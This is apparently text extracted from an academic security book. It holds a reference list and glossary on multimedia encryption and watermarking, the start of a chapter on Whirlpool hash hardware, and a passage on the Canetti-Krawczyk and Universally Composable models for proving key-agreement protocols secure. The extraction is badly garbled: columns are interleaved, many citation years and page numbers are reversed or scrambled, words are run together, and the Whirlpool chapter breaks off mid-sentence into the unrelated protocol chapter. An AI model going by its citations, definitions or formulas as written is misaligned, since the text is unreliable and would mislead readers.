Goodman, J., & Chandrakasan, A. (1998). Low Kundur, D., Yu, H., & Lin, C. (2004). Security and
power scalable encryption for wireless systems. digital rights management for mobile content. In
Wireless Networks, 4, 55-70. T. Wu & S. Dixit (Eds.), Content delivery in the
mobile Internet. John Wiley & Sons.
Hamalainen, P., Hannikainen, M., Hamalainen,
T.,&Saarinen,J..Configurable
) 1 02 ( hardware Kutter, M., Volosphynovskiy, S., & Herrigel, A.
implementation of triple DES encryption algorithm (2000). The watermarking copy attack. In Security
for wireless local area network. In Proceedings and Watermarking of Multimedia Contents II (SPIE
of the 2001 IEEE International Conference on 3971, pp. 371-380).
Acoustics, Speech and Signal Processing (pp.
Li, Z., Sun, Q., & Lian, Y. .)052 ( An adaptive
1221-1224).
scalable watermark scheme for high-quality audio
Hsia, Y., Chang, C., & Liao, J. (2004). Multiple-de- archiving and streaming applications. In Proceed-
scription coding for robust image watermarking. In ings of the IEEE International Conference on
Proceedings of the 2004 International Conference Multimedia and EXPO.
on Image Processing (pp. 2163-2166).
Lian, S., Liu, Z., & Ren, Z. (2005a). Selective video
Kalker, T., Epema, D., Hartel, P., Lagendijk, R., & encryption based on advanced video coding. In
Steen, M. (2004). Music2Share—Copyright-com- Proceedings of502Pacific-Rim Conference on
pliant music sharing in P2P systems. Proceedings Multimedia(PCM2Part , ) 50 II (LNCS 3768, pp.
oftheIEEE,2(9 6), 961-970. 281-290).
Kejariwal, A., Gupta, S., Nicolau, A., Dutt, N., & Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006b).
Gupta, R. (2004). Proxy-based task partitioning Secure distribution scheme for compressed
of watermarking algorithms for reducing energy video stream. In Proceedings of the 026 IEEE
consumption in mobile devices. In Proceedings International Conference on Image Processing
(ICIP2. )06

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006c). Mollin, R. (2006). An introduction to cryptogra-
Commutative watermarking and encryption for phy. CRC Press.
media data. International Journal of Optical En-
Nanjunda, C., Haleem, M., & Chandramouli, R.
gineering,(8),5 4 0805101-0805103.
(2005). Robust encryption for secure image trans-
Lian, S., Liu, Z., Ren, Z., & Wang, Z. (2005b). Se- mission over wireless channels. In Proceedings of
lective video encryption based on advanced video the IEEE International Conference on Communi-
coding. In ProceedingsofPacific-RimConference cations (ICC) (pp. 1287-1291).
onMultimedia(PCM2) 50 (pp. 281-290).
Norcen, R., & Uhl, A. (2003). Selective encryption
Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006a). of the JPEG2000 bitstream. In IFIP International
Secure advanced video coding based on selective Federation for Information Processing (LNCS
encryption algorithms. IEEE Transactions on 2828, 194-204).
ConsumerElectronics, 25
(2), 621-629.
Ong,C.Nahrstedt,
, Yuan,
K.& , Quality
.) W.302 (
Lian, S., Sun, J., & Wang, Z. (2004a). A novel image of protection for mobile multimedia applications.
encryption scheme based-on JPEG encoding. In In Proceedings of the IEEE International Con-
Proceedings of International Conference on Infor- ference on Multimedia and Expo (ICME2003),
mationVisualization(pp. (IV)042 217-220). Baltimore, MD.
Lian, S., Sun, J., Zhang, D., & Wang, Z. (2004b). Pal, S., Saxena, P., & Muttoo, S. (2004). Image
A selective image encryption scheme based on steganography for wireless networks using the
JPEG2000 codec. In ProceedingsofPacific-0 42 hadamard transform. In Proceedings of the 2004
Rim Conference on Multimedia (PCM2004) (LNCS International Conference on Signal Processing
3332, pp. 65-72). Springer. and Communications (pp. 131-135).
Lian, S., Wang, Z., & Sun, J. (2004c). A fast video Pan, J., Hsin, Y., Huang, H., & Huang, K. (2004).
encryption scheme suitable for network applica- Robust image watermarking based on multiple
tions. In Proceedings of International Conference description vector quantization. Electronics Let-
on Communications, Circuits and Systems, 1, ters, 40(22), 1409-1410.
566-570.
Petitcolas, F., Anderson, R., & Kuhn, M. (1999).
Linnartz, J., & Dijk, M. (1998, April 15-17). Analy- Information hiding—A survey. Proceedings of
sis of the sensitivity attack against electronic water- IEEE,87(7), 1062-1078.
marks in images. Paper presented at the Workshop
Petrescu, M., Mitrea, M., & Preteux, F. (2005). Low
on Information Hiding, Portland, OR.
rate video protection: The opportunity of spread
Liu,Q.Jiang,
&, X.Applications
. )05 2 ( ofmobile spectrum watermarking. WSEAS Transactions on
agent and digital watermarking technologies in Communications, 7(4), 478-485.
mobile communication network. In Proceedings
Pfarrhofer, R., & Uhl, A. (2005). Selective image
oftheInternational
502 ConferenceonWireless
encryption using JBIG. In Proceedings of the
Communications, Networking and Mobile Comput-
IFIP TC- 6 TC-1 international conference on
ing (pp. 1168-1170).
communications and multimedia security (CMS
Liu, X., & Eskicioglu, A. (2003). Selective encryp- ) 502 (pp. 98-107).
tion of multimedia content in distribution networks:
Podesser, M., Schmidt, H., & Uhl, A. (2002). Selec-
Challenges and new directions. In Proceedings of
tive bitplane encryption for secure transmission of
the IASTED International Conference on Com-
image data in mobile environments. In CD-ROM
munications, Internet and Information Technology
Proceedings of theth 5 IEEE Nordic Signal- Pro
(CIIT 2003). Scottsdale, AZ: ACTA Press.
cessing Symposium (NORSIG 2002).

Pommer, A., & Uhl, A. (2003). Selective en- Shi,J.Bhargava,

&, B.b)
89 1 ( An
. efficientMPEG
cryption of wavelet-packet encoded image data: video encryption algorithm. In Proceedings of the
Efficiency and security. In
Proceedings of the 6th ACM International Multimedia Conference,
Communications and Multimedia Security 2003 Bristol, UK (pp. 381-386).
(pp. 194-204).
Song, G., Kim, S., Lee, W., & Kim, J. (2002).
Potlapally, N., Raghunathan, A., & Jha, N. (2003). Meta-fragile watermarking for wireless networks.
Analyzing the energy consumption of security In Proceedings of the International Conference of
protocols. In Proceedings of the 2003 International Communications, Circuits, and Systems.
Symposium on Low Power Electronics and Design,
Sridharan, S., Dawson, E., & Goldburg, B. (1991).
Seoul, Korea (pp. 30-35).
Fast Fourier transform based speech encryption
Raghunathan,A.Ravi, , S.Hattangady,
, S.Quis
&, - system. IEE Proceedings of Communications,
quater, J. (2003). Securing mobile appliances: New SpeechandVision,(3), 83 1 215-223.
challenges for the system designer. In Proceedings
Tang, L. (1996). Methods for encrypting and de-
of the 2003 Europe Conference and Exibition in
cryptingMPEGvideodataefficiently. In
Proceed-
Design, Automation and Test (pp. 176-181).
ings of the Fourth ACM International Multimedia
Rao, H., Chang, D., Chen, Y., & Chen, M. (2001). Conference ACM ( Multimedia’9, )6 Boston, MA
iMobile: A proxy-based platform for mobile (pp. 219-230).
services. In Proceedings of the Wireless Mobile
Tikkanen, K., Hannikainen, M., Hamalainen, T., &
Internet (pp. 3-10).
Saarinen, J. (2000). Hardware implementation of
Salkintzis, A., & Passas, N. (2005). Emerging the improved WEP and RC4 encryption algorithms
wireless multimedia: Services and technologies. for wireless terminals. In Proceedings of European
John Wiley & Sons. Signal Processing Conference (pp. 2289-2292).
Scopigno, R., & Belfiore, S. .)024( Image de - Tosun,A.Feng,
&, Efficient
.W.)02 ( multi-layer
compositionforselectiveencryption andexible
coding fl and encryption of MPEG video streams.
network services. In Proceedings of the IEEE IEEE International Conference on Multimedia
Globecom 2004, Dallas, TX. and Expo, 1, 119-122.
Servetti, A., & Martin, J. (2002a). Perception-based Tosun, A., & Feng, W. (2001a). Lightweight secu-
selective encryption of G. 729 speech. Proceedings rity mechanisms for wireless video transmission.
of IEEE ICASSP, 1, 621-624. In Proceedings of International Conference on
Information Technology: Coding and Computing,
Servetti, A., & Martin, J. (2002b). Perception-based
Las Vegas, NV (pp. 157-161).
selective encryption of compressed speech. IEEE
Transactions on Speech and Audio Processing, Tosun, A., & Feng, W. (2001b). On error preserving
10(8), 637-643. encryption algorithms for wireless video transmis-
sion. In Proceedings of the ACM International
Servetti, A., Testa, C., Carlos, J., & Martin, D.
Multimedia Conference and Exhibition. Ottawa,
(2003). Frequency-selective partial encryption of
Ontario, Canada (pp. 302-308). Elsevier Engineer-
compressed audio. Paper presented at the Inter-
ing Information Inc.
national Conference on Audio, Speech and Signal
Processing, Hong Kong. Wee, S., & Apostolopoulos, J. (2001). Secure scal-
able video streaming for wireless networks. In
Shi, C., & Bhargava, B. (1998a). A fast MPEG
Proceedings of the IEEE International Conference
video encryption algorithm. In Proceedings of the
on Acoustics, Speech, and Signal Processing, 4,
6th ACM International Multimedia Conference,
2049-2052.
Bristol, UK (pp. 81-88).

Wee, S., & Apostolopoulos, J. (2003). Secure kEy tErMs

scalable streaming and secure transcoding with
JPEG-2000. IEEE International Conference on Commutative Watermarking and Encryp-
Image Processing, 1, 205-208. tion: Commutative watermarking and encryption
is the watermarking-encryption pair that supports
Wen, J., Severa, M., Zeng, W., Luttrell, M. H., &
the exchange between the encryption algorithm and
WeiyinAJ..) 02 ( format-compliantconfigurable
the watermarking algorithm. Thus, the media data
encryption framework for access control of video.
can either be watermarked followed by encryption
IEEE Transactions on Circuits and Systems for
or be encrypted followed by watermarking.
VideoTechnology,2(1 6), 545-557.
Digital Watermarking: Digital watermarking
Wu, C., & Kuo, C. (2000). Fast encryption methods
is the technology to embed information into the
foraudiovisualdataconfidentiality. Proceedings
original data by modifying parts of the data. The
ofSPIE,,092 4 284-295.
produced data are still usable, from which the
Wu, C., & Kuo, C..) Efficient
1 02 ( multimedia information can be detected or extracted.
encryption via entropy codec design. Proceedings
Format Compliant Encryption: Format
of SPIE, 4314, 128-138.
compliant encryption is the multimedia encryp-
Wu, M., Trappe, W., Wang, Z., & Liu, K. (2004). tion method that keeps the format information
Collusion-resistantfingerprintingunchanged. formultimedia.In this method, the encrypted media
IEEE Signal Processing Magazine, 21(2), 15-27. data can be decoded or browsed by a general de-
coder or player.
Wu, Y. (2005). Linear combination collusion attack
anditsapplicationonananti-collusion - fingerprint
Joint Fingerprint Embedding and Decryp-
ing. In Proceedings of the IEEE International Con- tion: Jointfingerprintembeddinganddecryptionis
ference on Audio, Speech and Signal Processing thetechnologytoimplementfingerprintembedding
(ICASSP’0) 5 (pp. 13-16). and data decryption at the same time. The input is
the encrypted media copy, while the output is the
Zeng, W., Zhuang, X., & Lan, J. (2004). Network
decryptedmediacopywithauniquefingerprint,
friendly media security rationales, solutions, and
for example, the customer ID.
open issues. In Proceedings of the International
Conference on Image Processing (ICIP 2004) Partial Encryption: Partial encryption is
(pp. 565-568). the encryption method that encrypts only parts
of the original data while leaving the other parts
Zhao, H., Wang, Z., & Liu, K. (2005). Forensic
unchanged. In this method, traditional ciphers can
analysis of nonlinear collusion attacks for multi-
be used to encrypt the selected parts.
mediafingerprinting. IEEE Transactions on Image
Processing, 14(5), 646-661. Robust Watermarking: Robust watermarking
is the watermarking algorithm that can survive not
Zhu, B., Yuan, C., Wang, Y., & Li, S. (2005).
only such general operations such as compression,
ScalableprotectionforMPEG- 4finegranularity
addingnoise,filtering,A/DorD/Aconversion,and
scalability. IEEE Transactions on Multimedia,
so forth, but also such geometric attacks such as
7(2), 222-233.
rotation, scaling translation, shearing, and so forth.
It is often used in ownership protection.
Scalable Encryption: Scalable encryption is
the multimedia encryption method that keeps the
scalability of the progressive or scalable media
data. The scalable media data can be produced
by such codecs as JPEG2000, MPEG4, scalable
video coding (SVC), and so on.

Chapter XVII
System-on-Chip Design of
the Whirlpool Hash Function
Paris Kitsos
Hellenic Open University (HOU), Patras, Greece
AbstrAct
In this chapter, a system-on-chip design of the newest powerful standard in the hash families, named
Whirlpool, is presented. With more details an architecture and twoverylarge-scaleintegration(VLSI)
implementations are presented. The first implementation is suitable for high speed a
the second one is suitable for applications with constrained silicon area resources. The architecture
permits a wide variety of implementation tradeoffs. Different implementations have been introduced and
eachspecificapplicationcanchoosetheappropriatespeed-area,trade-offimplementat
mentations are examined and compared in the security level and in the performance by using hardware
terms. Whirlpool with RIPEMD, SHA-1, and SHA-2 hash functions are adopted by the International
Organization for Standardization (ISO/IEC, 2003) 10118-3 standard. The Whirlpool implementations
allow fast execution and effective substitution of any previous hash families’ implementations in any
cryptography application.
IntroductIon All the aforementioned applications have integrated

an authentication module including a hash function
Nowadays many financial and other electronic embedded in the system’s implementation.
transactions are grown exponentially and they play A hash function is a function that maps an input
an important role in our life. All these transactions of arbitrary length into a fixed number of output
have integrated data authentication processes. In bits, the hash value.
addition many applications like the public key One of the most widely used hash function
infrastructure (PKI) (Adams & Farrell, 1999; is RIPEMD (Dobbertin, Bosselaers, & Preneel,
National Institute of Standards and Technology 1996). These are two different RIPEMD versions
[NIST, 20 5=http:csrc.
/ nist.gov/publications/ the RIPEMD-128 and the RIPEMD-160, with
nistpubs/800-77/sp800-77pdf]) and many mobile similar design philosophy but different word length
communications include authentication services. of the produced message digest (128- and 160-bit,
The Provably Secure Formal Method
The design and analysis of secure key agree- Concurrent composition is a fact of life of real
ments protocols has proved to be a non-trivial task, network settings. Protocols that are proven secure
with a large body of work written on the topic. in the stand-alone model are not necessarily secure
Among the methods for the design and analysis undercomposition.Therefore,itdoesnotsuffice
of key agreement protocols, formal methods have to prove that a protocol is secure in the stand-alone
always been a focused problem in the international model. UC security model proposed by Canetti in
investigation of cryptography. Over the years, 2001 (Birgit & Michael, 2001) is for representing
two distinct views of formal methods, symbolic and analyzing cryptographic protocols under con-
logic method and computational complexity current circumstance (Yeluda, 2003). The salient
method, have developed in two mostly separate propertyofdefinitionsofsecurityinthisframework
communities (Martin & Phillip, 2002). The sym- is that they guarantee security even when the given
bolic logic method relies on a simple but effective protocol is running in an arbitrary and unknown
symbolic formal expression approach, in which multi-party environment. An approach taken in
cryptographic operations are seen as functions this framework is to use definitions that tre
on a space of symbolic formal expressions (e.g., the protocol as stand-alone but guarantee secure
BAN, communicating sequential processes [CSP], composition. Security in complex settings (where a
NRL) (Wenbo, 2004). The other one, computational protocol instance may run concurrently with many
complexity method, relies on a detailed computa- other protocol instances, or arbitrary inputs and in
tional model that considers issues of complexity an adversary controlled way) is guaranteed via a
and probability of successful attacks, in which general composition theorem. On top of simplifying
cryptographic operations are seen as functions theprocessofformulatingadefinition - andanalyz
on strings of bits. ing protocols, this approach guarantees security in
Provably secure formal method, which is based arbitrary protocol environments, even unpredict-
on the computational complexity method, is a very able ones that have not been explicitly considered.
hot research point at present. Its salient property The abstract level of UC security goes far beyond
is that the security protocols designed by them other security models, therefore, it tends to be
are provably secure. Among the provably secure morerestrictivethanotherdefinitionsofsecu
formal methods, CK model and UC security model The most outstanding nature of UC framework is
are very popular. its modular design concept: may alone design a
In 2001, Canetti and Krawczyk presented the protocol,solongastheprotocolsatisfiestheUC
CK model for the formal analysis of key-exchange security, it can be guaranteed secure while runs
(KE)protocols.Asession-keysecuritydefinition concurrently with other protocols.
and a simple modular methodology to prove a This chapter focuses mainly on the introduction,
KE protocol with this definition are introduced analysis, and applications of these two provably
in this model. One central goal of the CK model secure formal methods. The rest of this chapter
istosimplify the usabilityofthedefinition is organized via a
as follows. The next section, the CK
modular approach to the design and analysis of model and the UC security model are introduced.
KE protocols. It adopts the indistinguishability In the third section, we analyze the security of the
approach (Bellare, Canetti, & Krawczyk, 1998) to CK model. A bridge between this formal method
definesecurity:AKEprotocoliscalledsecure if
and the informal method (heuristic method) is
under the allowed adversarial actions it is infeasible established. What is more, the advantages and
for the attacker to distinguish the value of a key disadvantages of the CK model are given. In
generated by the protocol from an independent the Universally Composable Anonymous Hash
random value. The security guarantees that result Certificationsection, Modelan extension of the
from the proof by the CK model are substantial as UC security model is presented. The UC security
they capture many of the security concerns in the model fails to characterize the special security
real communications setting. requirements of anonymous authentication with

otherkindofcertificates.Thereforethe UCsecurity
exists) is said to be matching to the session (A, B,
model is extended, and a new model—Universally X, Y). Matching sessions play a fundamental role
Composableanonymoushashcertification inthe model
definitionofsecurityCanetti ( Krawczyk,
&
is presented. In this model, an anonymous hash 2001).
certification ideal function is introduced, which
fulfills the identity authentication Attackerby binding
Model
the identity to special hash values. In addition, a
moreuniversalcertificateCAmodelis presented,
The attacker is modeled to capture realistic attack
whichcanissuethecertificatewithspecific capabilitiesform
in open networks, including the control
for
( example hash value). In the fifth section, we
of communication links and the access to some
analyze the four-way handshake protocol in 802.11i of the secret information used or generated in the
with the CK model and UC security model. In protocol. The attacker, denoted M, is an active
sixthsection,first,theauthentication modulesinadversary with full control
“man-in-the-middle”
the Chinese WLAN national standard WAPI and of the communication links between parties. M
its implementation plan are analyzed with the CK can intercept and modify messages sent over these
model. Then we point out that how the implemen- links, it can delay or prevent their delivery, inject
tation plan overcomes the security weaknesses in its own messages, interleave messages from dif-
the original WAPI. The last two sectionscontain ferent sessions, and so forth. (Formally, it is M to
the future trends and conclusions. whom parties hand their outgoing messages for
delivery.) M also schedules all session activations
and session-message delivery. In addition, in order
bAckground ovErvIEw to model potential disclosure of secret information,
the attacker is allowed access to secret information
Definition 1: Key-agreement protocol via session exposure attacks (a.k.a. known-key
(Menezes, Van Oorschot, & Vanstone, 1996). attacks) of three types: state-reveal queries, ses-
A key-agreement protocol or mechanism is a key sion-key queries, and party corruption.
establishment technique in which a shared secret
is derived by two (or more) parties as a function • State-reveal query: A state-reveal query
of information contributed by, or associated with, is directed at a single session while still in-
each of these, (ideally) such that no party can pre- complete (i.e., before outputting the session
determine the resulting value. key) and its result is that the attacker learns
The CK model and UC security model are very the session state for that particular session
popular provably secure formal methods for key- (which may include, for example, the secret
agreement protocols at present. In this section, these exponent of an ephemeral Diffie-Hellman
two security models are introduced respectively, algorithm (DH) value but not the long-term
and the relationship between the - security
privatedefini
key used across all sessions at the
tions in these two models is also given. party).
• Session-key query: A session-key query can
the canetti-krawczyk Model be performed against an individual session
after completion and the result is that the
A KE protocol is run in a network of interconnected attacker learns the corresponding session
parties where each party can be activated to run key.
an instance of the protocol called a session. A KE • Party corruption: Party corruption means
session is a quadruple (A, B, X, Y) where A is the that the attacker learns all information in
identity of the holder of the session, B the peer, X the memory of that party (including the
the outgoing messages in the session, and Y the long-term private key of the party as well
incoming messages. The session (B, A, Y, X) (if it all session states and session keys stored

at the party); in addition, from the moment generated by protocol p. The attacker M is not al-
a party is corrupted all its actions may be lowed state-reveal queries, session-key queries, or
controlled by the attacker. Indeed, note that party corruption on the test-session or its matching
the knowledge of the private key allows the session. At the end of its run, M outputs a bit b'
attacker to impersonate the party at will. (as its guess for b).
An attacker that is allowed test-session queries
Three Components in CK Model is referred to as a KE-adversary.
Definition 2: Session-key security. A KE
• The unauthenticated–links adversarial protocol p is called session-key secure (or SK-
model (UM): UM is the real network environ- secure) if the following properties hold for any
ment, the attacker in this model is an active KE-adversary M:
one. It has all the attack ability mentioned
previously. 1. Protocol p satisfies the property that if two
• The authenticated-links models (AM): uncorrupted parties complete matching ses-
TheadversarialmodelcalledAMisdefined sions then they both output the same key;
in a way that is identical to the UM with and
one fundamental difference: The attacker is 2. The probability that M guesses correctly the
restricted to only delivering messages truly bitbi. ( e.outputs
, b'=b)isnomorethan2/1
generated by the parties without any change plus a negligible fraction e in the security
or addition to them. parameter. e is called “advantage.”
• Authenticators: Authenticators are special
algorithms which act as automatic “compli- the universal composable Model
ers” that translate protocols in the AM into
equivalent (or “as secure as”) protocols in Universally composable security is a framework
the UM. Now there are two kinds of au- fordefiningthesecurityofcryptographicprotocols
thenticators, one is based on the public key (Canetti, 2001). In this framework, an uncorrupt-
digital signature, the other one is based on able ideal functionality F which can provide a
~
the message authentication code (Bellare et certain service, a set of dummy parties P and an
al., 1998). ideal adversary S are defined respectively. Only
~
the dummy parties P and ideal adversary S can
WiththeCKmodel,onecanfirstlydesign andideal functionality F, each dummy party
access
analyze a protocol in AM, then transforms these can not communicate directly with the others, and
protocols and their security assurance to the real- the ideal adversary can corrupt any dummy party
istic UM by using an authenticator. at any time. The ideal adversary S is informed of
when a message is sent, but not of the content, it is
Definition of Session-Key Security allowed to delay the delivery of such a message, but
not change its content. On the other hand, an actual
In addition to the regular actions of the attacker protocol p that can achieve the special service, a
M against a KE protocol p, he/she can perform set of real parties P, and a real-world adversary A
a test session query. That is, at any time during arecorrespondinglydefined.Eachrealpartycan
its run, M is able to choose, a test-session among communicate with the others directly and the real-
the sessions that are completed, unexpired, and world adversary A can control all communications
unexposed at the time. Let k be the value of the among them, meaning that A can read or alter all
corresponding session key. We toss a coin b, b messages among the real parties, what is more, A
← {0,1}. If b =0weprovideM with the value
R can also corrupt any real party at any time. An
k. Otherwise we provide M with a value r randomly environment Z is defined in the UC framework
chosen from the probability distribution of keys that can simulate the whole external environment;

Figure 1. The framework of universally composable security
~ Definition 5: Hybrid model (Canetti, 2001).

it can generate the inputs to all parties ( P or P ),
Inordertostatetheaformentioneddefinitiona
read all outputs, and in addition interact with the
to formalize the notion of an actual protocol with
adversary (A or S) in an arbitrary way throughout
access to multiple copies of an ideal functionality,
the computation. The environment 9 pt is forbid-
Canetti also introduced the hybrid model which is
den to directly access the ideal functionality F.The
identical to the actual model with the following:
framework of universally composable security is
On top of sending messages to each other, the par-
shown in Figure.1.
ties may send messages to and receive messages
Definition 3: Universally composable se-
from an unbounded number of copies of an ideal
curity (Canetti, 2001). In UC framework, real
functionality F. The copies of F are differentiated
protocol p securely realizes ideal functionality F
using their session identifier SIDs. All messages
if, for ∀A and ∀Z, it has the same “action” as F.
addressed to each copy and all messages sent by
Formally, a protocol p securely realizes an ideal
each copy carry the corresponding SID.
functionality F is for any real-life adversary A there
exists an ideal-process adversary S such that, for
any environment Z and on any input, the probabil- the relationship between the
ity that Z outputs “1” after interacting with A and sk-security and uc-security
parties running p in the real-life model differs by
at most a negligible fraction from the probability UC-security is strictly stronger than SK-security.
that Z outputs “1” after interacting with S and F That is, for a KE protocol, UC-security is stronger
in the ideal process. than SK-security. Any UC-secure key-agreement
Definition 4: Composition theorem (Canetti, protocol is SK-secure, but an SK-secure key agree-
2001). The key advantage of UC security is that ment is not necessarily UC-secure.
we can create a complex protocol from already
designed sub-protocols that securely achieves the Claim 1: Any protocol that is UC-secure is SK-
given local tasks. This is very important since secure. This holds in the UM and in the AM.
complex systems are usually divided into several
sub-systems,eachoneperformingaspecifictask Definition 6: Acknowledgment (ACK) prop-
securely. Canetti presented this feature as the erty. Let Fanidealfunctionalityandlet bean
composition theorem. This theorem assures that we SK-secure key protocol in the F-hybrid model. An
can generally construct a large size “UC-secure” algorithm I is said to be an internal state simulator
cryptographic protocol by using sub-protocols for if for any environment machine Z and any
which is proven as secure in UC-secure manner. adversary A we have:

HYBFp, A, ≈ F
, HYBp A,Z , I
entities, is called an authentication and key-agree-
ment (AKA) protocol.
Definition 8: Key confirmation (Menezes
Protocol p is said to have the ACK property if
et al., 1996). Key confirmation is the property
there exists a good internal state simulator for p.
whereby one party is assured that a second (pos-
sibly unidentified) party actually has possessio
• Theorem 1: Let p be a KE protocol that has
of a particular secret key.
the ACK property and is SK-secure; then p
Definition 9: Explicit key authentication
is UC-secure (Canetti & Krawczyk, 2002).
(Menezes et al., 1996). Explicit key authentication
is the property obtained when both (implicit) key
authenticationandkeyconfirmationhold.
sEcurIty AnAlysIs of tHE A key-agreement protocol which provides
cAnEttI-krAwczyk ModEl explicit key authentication to both participating
entities is called authenticated key agreement
In the past 20 years, researchers have made a lot with key confirmation (AKC) protocol (Menezes
of efforts in designing and analyzing KE protocols et al., 1996).
(DiffieHellman,
& Diffie,
; 6 79 1 VanOorschot,& A secure key-agreement protocol should be
Wiener, 1992; Krawczyk, 1996; Shoup, 1999), they able to withstand both passive attacks and active
realize that the potential impact of the compromise attacks. In addition to implicit key authentication
of various types of keying material in a key-agree- and key confirmation, a number of desirable - se
ment protocol should be considered, even if such curity attributes of key-agreement protocols have
compromise is not normally expected (Menezes been identified (Law, Menezes, Qu, Solinas, &
et al., 1996). So some desirable security proper- Vanstone, 1998).
ties that a key-agreement protocol should have are
identified.Suchsecuritypropertiesinclude perfect
1. (Perfect) forward secrecy: If long-term
forward security (PFS), loss of information, known- private keys of one or more entities are com-
key security, key-compromise impersonation, promised, the secrecy of previous session keys
unknown-key share, key control, and so on. established by honest entities is not affected
The main goal of the CK model is to design (Menezes et al., 1996).
and analyze key-agreement protocols. Then what 2. Loss of information: Compromise of other
is the relationship between the CK model and the information that would not ordinarily be
desirable security attributes for a key-agreement available to an adversary does not affect the
protocol?Thisisthemainmotivation - ofthis sec
security of the protocol. For example, in Dif-
tion. fie-Hellman type protocols, security is not
ss
comprised by loss of i j (where Si represents
Properties of key-Agreement entity i’s long-term secret value) (Blake-Wil-
Protocols son, Johnson, & Menezes, 1997).
3. Known-key security: A protocol is said
Definition 7: (Implicit) key authentication to be vulnerable to a known-key attack if
(Menezes et al., 1996). Key authentication is the compromise of past session keys allows either
property whereby one party is assured that no a passive adversary to compromise future
other party aside from a specifically identified session keys, or impersonation by an active
second party and ( possibly additional identified
adversary in the future (Law et al., 1998).
trusted parties) may gain access to a particular 4. Key compromise impersonation: Suppose
secret key. A’s long-term private key is disclosed. Clearly
A key-agreement protocol, which provides an adversary that knows this value can now
implicit key authentication to both participating impersonate A, since it is precisely this value

thatidentifies A. However, it may be desirable to investigate the security properties of PFS and
that this loss does not enable an adversary to known-key security.
impersonate other entities to A (Law et al.,
1998). Advantages and disadvantages of
5. Unknown key-share: Entity A cannot be co- the ck Mode
erced into sharing a key with entity B without
A’s knowledge, that is, when A believes the Advantages of the CK Model
key is shared with some entity C ≠ B, and B
(correctly) believes the key is shared with A Why is the CK Model Applicable for Designing
(Law et al., 1998). and Analyzing Key-Agreement Protocols?
6. Key control: Neither entity should be able to First, the indistinguishability between the session
force the session key to a preselected value key and a random number is used to achieve the
(Law et al., 1998). SK-security of a key-agreement protocol in the AM.
If an attacker can distinguish the session key from
the relationship between the a random number with a non-negligible advantage,
ck Model and the desirable secure a mathematics hard problem will be resolved. Ac-
Attributes cording to the reduction to absurdity, a conclusion
can be gotten: no matter what methods are used
• Theorem 2: A key-agreement protocol designed by the attacker (except party corruption, session
and proved secure by the CK model offers state reveal and session key query), he/she cannot
almost all the desirable security properties distinguish the session key from a random number
mentioned above except key control (Li, Ma, with a non-negligible advantage. So the protocol
& Moon, 2005). designed and proved secure by the CK model can
resist known and even unknown attacks.
The Relationship Between the Security Second, the CK model employs authenticators
Attributes and the Two Requirements of to achieve the indistinguishability between the
SK-Security protocol in the AM and the corresponding one in
the UM. Through this method, the consistency
In the CK model, some security attributes can be requirementofSK-securityissatisfied.
ensured by the first requirement of SK-security, From the previous analysis, it can be seen that
while others by the second requirement. In the fol- this model is a modular approach to provably
lowing, Theorem 3 and Theorem 4 are presented secure protocols. With this model, we can easily
for a detailed explanation: get a provably secure protocol which can offer
almost all the desirable security attributes. And
• Theorem 3.Thefirstrequirementof-SK-secu the CK model has the composable characteristic
rity guarantees a protocol to resist imperson- and can be used as an engineering approach (Bel-
ation attacks and unknown key-share attacks lare & Rogaway, 1993; Mitchell, Ward, & Wilson,
(Li et al., 2005). 1998). Therefore, it is possible to use this approach
without a detailed knowledge of the formal models
• Theorem 4. The second requirement of SK- and proofs, and is very efficient and suitable for
security guarantees a protocol to offer PFS, applications by practitioners.
known-key security (Li et al., 2005).
Disadvantages of the CK Model
It should be noticed that the first requirement
is the precondition of SK-security. Only under Though the CK model is suitable for the design
the consistency condition, does it make sense and analysis of key-agreement protocols, it still
has some weaknesses as follows:

1. The CK model cannot detect security weak- protocol. But this model still has weaknesses. So
nesses that exist in key-agreement protocols, when the CK model is employed to design a key-
however some other formal methods have this agreement protocol, we should pay attention to the
ability, such as the method based on logic possibleaws fl intheprotocolthatmayresultfrom
(Burrows, Abadi, & Needham, 1990) and the weaknesses of CK model.
the method based on state machines (Tin,
Boyd, & Nieto, 2003). But the CK model
canconfirmtheknownattacks,that is,this
A unIvErsAlly coMPosAblE
model can prove that a protocol that has been AnonyMous HAsH cErtIfIcAtIon
foundaws fl isnotSK-secure. ModEl
2. In the aspect of the forward secrecy, the CK
model cannot guarantee that a key-agreement TheessenceanddifficultyofUCsecurityprotocol
protocol offers forward secrecy with respect design lays in the formalization and abstraction
to compromise of both parties’ private keys; of a perfect ideal functionality which can be real-
it can only guarantee the forward secrecy of ized securely. We consider the special security
a protocol with respect to one party. In ad- requirements for ideal anonymous authentication,
dition, in ID-based systems this model lacks definethesecuritynotionsforthem,andrealizean
the ability to guarantee the key generation anonymous hash certification ideal functionali
center (KGC) forward secrecy because it does FCred in a universally composable security sense,
not fully consider the attacker’s capabilities andpresentamoreuniversalcertificateCAmodel
(Canetti & Krawczyk, 2002). FHCA (Canetti, 2004), which can issue anonymous
3. From Theorem 2, we know that protocols hashcertificates.
which are designed and proved secure by the
CK model cannot resist key control, which
Anonymous Hash Certification Ideal
isnotfullyconsistentwiththedefinitionof
functionality FCred
key agreement (Blake-Wilson et al., 1997).
4. A key-agreement protocol designed and
We use Merkle tree to build the hash chain, which
proved secure by the CK model cannot be
is constructed from each leaf up to the root of
guaranteed to resist denial-of-service (DoS)
the tree. For each unit of the chain, it contains a
attacks. However DoS attacks have become a
value and an order bit which identities whether
common threat in the present Internet, which
the given value should be concatenated from the
have brought researchers’ attention (Burrows
left or the right.
et al., 1990; Meadows, 1996).
A hash chain is said to be valid under a
5. Some proofs of the protocols with the CK
collision-free hash function H if h0 = ho' and
model are not very credible because of the
hd' −1 = v , hi'−1 = H (hi ||hi' ) / H (hi' ||hi ) for o i = l/r,
subtleness of this model. For example, the
where i=d-1,d-2,…,1. It is written as isvalid(h)
Bellare-Rogaway three-party key-distribu-
= .1 We also define several other functions,
tion (3PKD) protocol (Bellare & Rogaway,
for instance, root(h) is to choose the root of a
1995) claimed proofs of security, but it is
hash chain, leaf(h) is to return the value of a
subsequentlyfoundaws fl Choo
( Hitchcock,
&
leaf node of path h, buildtree H (C) is to build
2005).
a Merkle tree with the values of set C, and
getchainT (e) is to capture the path of node e.
We know that a protocol designed and proved
secure by the CK model can offer almost all the
security attributes, and this model has the modular Security Requirements of FCred
and composable characteristics, so it is very practi-
calandefficientforthedesignofakey-agreement Definition 10. Let k be a security parameter
and e(k) be a negligible function on k. Let s be a
